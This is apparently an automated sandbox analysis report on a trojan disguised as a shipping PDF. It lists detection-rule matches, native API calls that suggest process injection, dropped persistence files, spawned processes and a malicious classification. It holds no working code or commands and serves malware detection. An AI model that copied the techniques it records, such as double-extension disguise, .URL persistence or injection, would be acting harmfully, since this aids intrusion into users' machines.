Source: Process Memory Space: Nyedvqj.exe PID: 6824, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: netsh.exe PID: 2848, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\Public\Libraries\jqvdeyN.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, type: DROPPED	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =

Detected potential crypto function

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041B8D6	11_2_0041B8D6
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C937	11_2_0041C937
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C254	11_2_0041C254
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041CB9E	11_2_0041CB9E
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C425	11_2_0041C425
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00408C80	11_2_00408C80
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C51F	11_2_0041C51F
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C5F3	11_2_0041C5F3
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00402D8B	11_2_00402D8B
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C686	11_2_0041C686
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C74A	11_2_0041C74A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041CF70	11_2_0041CF70
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041C776	11_2_0041C776
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BB20A0	11_2_00BB20A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9B090	11_2_00B9B090
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C520A8	11_2_00C520A8
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C41002	11_2_00C41002
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BA4120	11_2_00BA4120
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B8F900	11_2_00B8F900
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00C522AE	11_2_00C522AE
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BBEBB0	11_2_00BBEBB0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00B9841F	11_2_00B9841F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00401030	17_2_00401030
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041B8D6	17_2_0041B8D6
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C937	17_2_0041C937
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C254	17_2_0041C254
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041CB9E	17_2_0041CB9E
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C425	17_2_0041C425
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00408C80	17_2_00408C80
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C51F	17_2_0041C51F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C5F3	17_2_0041C5F3
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00402D8B	17_2_00402D8B
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00402D90	17_2_00402D90
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C686	17_2_0041C686
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C74A	17_2_0041C74A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041CF70	17_2_0041CF70
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041C776	17_2_0041C776
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00402FB0	17_2_00402FB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A020A0	17_2_00A020A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA20A8	17_2_00AA20A8
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009EB090	17_2_009EB090
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A91002	17_2_00A91002
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009DF900	17_2_009DF900
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F4120	17_2_009F4120
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA22AE	17_2_00AA22AE
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A0EBB0	17_2_00A0EBB0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A9DBD2	17_2_00A9DBD2
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA2B28	17_2_00AA2B28
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009E841F	17_2_009E841F
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A02581	17_2_00A02581
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA25DD	17_2_00AA25DD
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009ED5E0	17_2_009ED5E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA2D07	17_2_00AA2D07
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009D0D20	17_2_009D0D20
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA1D55	17_2_00AA1D55
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA2EF7	17_2_00AA2EF7
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_009F6E30	17_2_009F6E30
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00AA1FF1	17_2_00AA1FF1

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: String function: 00B8B150 appears 31 times
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: String function: 009DB150 appears 35 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004185E0 NtCreateFile,	11_2_004185E0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00418690 NtReadFile,	11_2_00418690
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00418710 NtClose,	11_2_00418710
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004187C0 NtAllocateVirtualMemory,	11_2_004187C0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004185DA NtCreateFile,	11_2_004185DA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041868A NtReadFile,	11_2_0041868A
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_0041870C NtClose,	11_2_0041870C
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_004187BA NtAllocateVirtualMemory,	11_2_004187BA
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_00BC98F0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,	11_2_00BC9860
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9840 NtDelayExecution,LdrInitializeThunk,	11_2_00BC9840
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC99A0 NtCreateSection,LdrInitializeThunk,	11_2_00BC99A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_00BC9910
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A20 NtResumeThread,LdrInitializeThunk,	11_2_00BC9A20
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_00BC9A00
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A50 NtCreateFile,LdrInitializeThunk,	11_2_00BC9A50
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC95D0 NtClose,LdrInitializeThunk,	11_2_00BC95D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9540 NtReadFile,LdrInitializeThunk,	11_2_00BC9540
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_00BC96E0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_00BC9660
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_00BC97A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,	11_2_00BC9780
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,	11_2_00BC9FE0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,	11_2_00BC9710
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC98A0 NtWriteVirtualMemory,	11_2_00BC98A0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9820 NtEnumerateKey,	11_2_00BC9820
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BCB040 NtSuspendThread,	11_2_00BCB040
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC99D0 NtCreateProcessEx,	11_2_00BC99D0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9950 NtQueueApcThread,	11_2_00BC9950
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A80 NtOpenDirectoryObject,	11_2_00BC9A80
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9A10 NtQuerySection,	11_2_00BC9A10
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BCA3B0 NtGetContextThread,	11_2_00BCA3B0
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Code function: 11_2_00BC9B00 NtSetValueKey,	11_2_00BC9B00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004185E0 NtCreateFile,	17_2_004185E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00418690 NtReadFile,	17_2_00418690
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00418710 NtClose,	17_2_00418710
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004187C0 NtAllocateVirtualMemory,	17_2_004187C0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004185DA NtCreateFile,	17_2_004185DA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041868A NtReadFile,	17_2_0041868A
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_0041870C NtClose,	17_2_0041870C
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_004187BA NtAllocateVirtualMemory,	17_2_004187BA
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk,	17_2_00A198F0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_00A19860
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19840 NtDelayExecution,LdrInitializeThunk,	17_2_00A19840
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A199A0 NtCreateSection,LdrInitializeThunk,	17_2_00A199A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_00A19910
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A20 NtResumeThread,LdrInitializeThunk,	17_2_00A19A20
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk,	17_2_00A19A00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A50 NtCreateFile,LdrInitializeThunk,	17_2_00A19A50
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A195D0 NtClose,LdrInitializeThunk,	17_2_00A195D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19540 NtReadFile,LdrInitializeThunk,	17_2_00A19540
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_00A196E0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_00A19660
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk,	17_2_00A197A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19780 NtMapViewOfSection,LdrInitializeThunk,	17_2_00A19780
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19FE0 NtCreateMutant,LdrInitializeThunk,	17_2_00A19FE0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19710 NtQueryInformationToken,LdrInitializeThunk,	17_2_00A19710
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A198A0 NtWriteVirtualMemory,	17_2_00A198A0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19820 NtEnumerateKey,	17_2_00A19820
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1B040 NtSuspendThread,	17_2_00A1B040
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A199D0 NtCreateProcessEx,	17_2_00A199D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19950 NtQueueApcThread,	17_2_00A19950
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A80 NtOpenDirectoryObject,	17_2_00A19A80
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19A10 NtQuerySection,	17_2_00A19A10
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1A3B0 NtGetContextThread,	17_2_00A1A3B0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19B00 NtSetValueKey,	17_2_00A19B00
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A195F0 NtQueryInformationFile,	17_2_00A195F0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19520 NtWaitForSingleObject,	17_2_00A19520
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1AD30 NtSetContextThread,	17_2_00A1AD30
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19560 NtWriteFile,	17_2_00A19560
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A196D0 NtCreateKey,	17_2_00A196D0
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19610 NtEnumerateValueKey,	17_2_00A19610
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19670 NtQueryInformationProcess,	17_2_00A19670
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19650 NtQueryValueKey,	17_2_00A19650
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19730 NtQueryVirtualMemory,	17_2_00A19730
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1A710 NtOpenProcessToken,	17_2_00A1A710
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19760 NtOpenProcess,	17_2_00A19760
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A19770 NtSetInformationFile,	17_2_00A19770
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Code function: 17_2_00A1A770 NtOpenThread,	17_2_00A1A770

Sample file is different than original file name gathered from version info

Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs Original Shipment Doc Ref 2853801324189923,PDF.exe
Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.378783717.0000000000E0F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Original Shipment Doc Ref 2853801324189923,PDF.exe

PE file contains strange resources

Source: Nyedvqj.exe.1.dr

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Section loaded: msmpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: msmpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Section loaded: msmpcom.dll	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

File read: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe 'C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe'
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
Source: unknown	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Process created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Process created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[1]

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/5@14/9

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: cmmon32.pdb source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: netsh.pdb source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: Nyedvqj.exe, 00000012.00000002.403223771.00000000005DA000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.376044686.0000000000B60000.00000040.00000001.sdmp, Nyedvqj.exe, 00000011.00000002.376043225.00000000009B0000.00000040.00000001.sdmp, Nyedvqj.exe, 00000012.00000002.403702389.0000000000A10000.00000040.00000001.sdmp, svchost.exe, 00000013.00000003.377211927.0000000003100000.00000004.00000001.sdmp, netsh.exe, 00000014.00000002.538070864.000000000395F000.00000040.00000001.sdmp, cmmon32.exe, 00000016.00000002.406881454.0000000004FDF000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmp
